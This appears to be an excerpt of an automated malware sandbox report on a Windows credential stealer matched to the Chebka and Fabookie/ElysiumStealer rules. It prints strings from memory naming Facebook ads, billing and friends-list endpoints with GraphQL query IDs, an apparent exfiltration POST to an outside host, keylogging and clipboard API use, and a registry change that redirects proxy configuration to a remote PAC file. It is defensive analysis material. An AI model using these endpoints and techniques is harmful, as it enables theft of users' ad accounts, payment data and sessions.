        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
        Source: svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "epsilon_checkpoint"https://www.facebook.com/ads/manager/account_settings/account_billing""ACCOUNT_ID":""USER_ID":""token":"async_get_token":"{"adAccountID":"{access_token:"{"sessionID":"account_currency_ratio_to_usd:https://www.facebook.com/ajax/settings/account/email.php?__a=1&fb_dtsg_ag=@@https://www.facebook.com/friends/list"all_friends_data":{"count":https://www.facebook.com/friends"friends_container_request_count":{"count":av=&__user=&fb_dtsg=&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=AccountQualityHubPageListCardQuery&variables=%7B%22assetOwnerId%22%3A%22%22%7D&doc_id=4988503034498154https://www.facebook.com/api/graphql/datauserDatapages_can_administerhttps://business.facebook.com/adsmanager/manage/accounts?act="adtrust_dsl":&business_id=&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=BillingAMNexusRootQuery&variables={"paymentAccountID":""}&doc_id=4075226092554060billable_account_by_payment_accountaccount_statusDISABLEDACTIVECLOSEDbalanceformattedbillable_account_tax_infobusiness_country_codecurrencystored_balance_statusprepay_account_balancebilling_threshold_currency_amountformatted_amountbilling_payment_accountbilling_payment_methodscredential__typenameExternalCreditCardPaymentPaypalBillingAgreementStoredBalanceExtendedCreditAdsToken&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=AccountQualityHubLandingPageQuery&doc_id=3953057938071449https://www.facebook.com/accountquality/?landing_page=insightsviewerad_accountsnodesadvertising_restriction_infoviewer_permissionsadminis_restrictedrestriction_daterestriction_typeaccount_userad_businessesbilling_txnsedgeshttps://www.facebook.com/ads/manage/invoices_generator/?ts=1281628800&time_end=1692929024&report=true&format=csv&act=https://www.facebook.com/ads/manage/invoices_generator/&variables=%7B%22paymentAccountID%22%3A%22%22%2C%22coun
t%22%3A10%2C%22cursor%22%3Anull%2C%22filters%22%3A%5B%5D%2C%22start_time%22%3A1281628800%2C%22end_time%22%3A1692929024%7D&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=BillingTransactionTableQuery&doc_id=5015578711817965https://www.facebook.com/ads/manager/billing_history/summary/&variables=%7B%22numOfGlobalScopesToLoad%22%3A500%2C%22businessPaginationCursor%22%3Anull%2C%22searchQuery%22%3A%22%22%2C%22assetTypeEnums%22%3A%5B%22AD_ACCOUNT%22%5D%2C%22numToLoad%22%3A50%2C%22localScopePaginationCursor%22%3Anull%2C%22bagIDs%22%3A%5B%22%22%5D%2C%22bypassAssetID%22%3A%22%22%2C%22bypassAssetTypeEnum%22%3A%22AD_ACCOUNT%22%2C%22bypassPermission%22%3Afalse%2C%22includeAllContainedAssetsIfBusinessAdmin%22%3Afalse%2C%22includeProfilePlusDelegatePages%22%3Afalse%7D&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=BusinessUnifiedScopingLocalSelectorSearchSourceQuery&doc_id=4492650077503003business_scopingglobal_scopesscope_namescope_idasset_listsasset_typeAD_ACCOUNTobjectsasset_idPragma: no-cache equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.facebook.com/Pragma: no-cache equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.facebook.com/accountquality/?landing_page=insights equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.facebook.com/ads/manage/invoices_generator/ equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.facebook.com/ads/manage/invoices_generator/?ts=1281628800&time_end=1692929024&report=true&format=csv&act= equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.facebook.com/ads/manager/billing_history/summary/ equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.facebook.com/ajax/settings/account/email.php?__a=1&fb_dtsg_ag= equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.facebook.com/api/graphql/ equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.facebook.com/friends equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.facebook.com/friends/list equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.facebook.com/login/device-based/turn-on/ equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.facebook.com/marketplace?ref=bookmark equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: [long concatenated string dump omitted] equals www.facebook.com (Facebook)
        Source: unknown | HTTP traffic detected: POST /api4.php HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 | Host: pp.abcgameabc.com | Content-Length: 274 | Connection: Keep-Alive | Cache-Control: no-cache
        Source: unknown | HTTPS traffic detected: 172.67.188.70:443 -> 192.168.2.3:49724 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 104.21.40.196:443 -> 192.168.2.3:49725 version: TLS 1.2
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0463B840 GetAsyncKeyState,Sleep,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState | 5_2_0463B840
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_046374B0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard | 5_2_046374B0
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04637510 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalSize,GlobalUnWire,CloseClipboard | 5_2_04637510

        E-Banking Fraud

        Source: C:\Windows\System32\svchost.exe | Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings AutoConfigURL http://35.236.159.79/win.pac
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_046365A0 CreateEventW,OpenDesktopW,CreateDesktopW,SetThreadDesktop,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplaySettingsW,GetDC,CreateCompatibleDC,GetVersionExA | 5_2_046365A0

        System Summary

        Source: 20.0.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 20.0.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 25.0.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 25.0.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 7.2.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 7.2.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 18.0.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 18.0.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 9.2.svchost.exe.244fc400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 9.2.svchost.exe.244fc400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 11.2.svchost.exe.2d6cb270000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 11.2.svchost.exe.2d6cb270000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 17.2.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 17.2.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 34.0.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 34.0.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 19.2.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 19.2.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 22.2.svchost.exe.25139800000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 22.2.svchost.exe.25139800000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 25.2.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 25.2.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 27.2.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 27.2.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 30.2.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 30.2.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 11.0.svchost.exe.2d6cb270000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 11.0.svchost.exe.2d6cb270000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 23.2.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 23.2.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 18.2.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 18.2.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 23.0.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 23.0.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 7.0.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 7.0.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 33.2.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 33.2.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 19.0.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 19.0.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 29.2.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 29.2.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 28.0.svchost.exe.24e72070000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 28.0.svchost.exe.24e72070000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 37.2.svchost.exe.12dbc510000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 37.2.svchost.exe.12dbc510000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 35.2.svchost.exe.28291080000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 35.2.svchost.exe.28291080000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 36.2.svchost.exe.151abe70000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 36.2.svchost.exe.151abe70000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 29.0.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 29.0.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 37.0.svchost.exe.12dbc510000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 37.0.svchost.exe.12dbc510000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 34.2.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 34.2.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 22.0.svchost.exe.25139800000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 22.0.svchost.exe.25139800000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 30.0.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 30.0.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 35.0.svchost.exe.28291080000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 35.0.svchost.exe.28291080000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 33.0.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 33.0.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 27.2.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 27.2.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 5.2.rundll32.exe.4630000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Fabookie / ElysiumStealer | Author: ditekSHen
        Source: 5.2.rundll32.exe.4630000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 5.2.rundll32.exe.4630000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 33.0.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 33.0.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 32.0.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 32.0.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 20.0.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 20.0.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 29.2.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 29.2.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 35.2.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 35.2.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 19.0.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 19.0.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 30.0.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 30.0.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 7.0.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 7.0.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 17.0.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 17.0.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 17.2.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 17.2.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 11.0.svchost.exe.2d6cb270000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 11.0.svchost.exe.2d6cb270000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 25.2.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 25.2.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 35.0.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 35.0.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 18.0.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 18.0.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 28.2.svchost.exe.24e72070000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 28.2.svchost.exe.24e72070000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 30.2.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 30.2.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 19.2.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 19.2.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 36.0.svchost.exe.151abe70000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 36.0.svchost.exe.151abe70000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 32.2.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 32.2.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 29.0.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 29.0.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 28.2.svchost.exe.24e72070000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 28.2.svchost.exe.24e72070000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 33.2.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 33.2.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 27.0.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 27.0.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 25.0.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 25.0.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 36.0.svchost.exe.151abe70000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 36.0.svchost.exe.151abe70000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 20.2.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 20.2.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 11.2.svchost.exe.2d6cb270000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 11.2.svchost.exe.2d6cb270000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 20.2.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 20.2.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 32.0.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 32.0.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 22.0.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 22.0.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 17.0.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 17.0.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 28.0.svchost.exe.24e72070000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 28.0.svchost.exe.24e72070000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 23.2.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 23.2.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 36.2.svchost.exe.151abe70000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 36.2.svchost.exe.151abe70000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 27.0.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 27.0.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 37.0.svchost.exe.12dbc510000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 37.0.svchost.exe.12dbc510000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 32.2.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 32.2.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 7.2.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 7.2.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 9.2.svchost.exe.244fc400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 9.2.svchost.exe.244fc400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
        Source: 22.2.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Chebka | Author: ditekSHen
        Source: 22.2.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Generic_a681f24a | Author: unknown
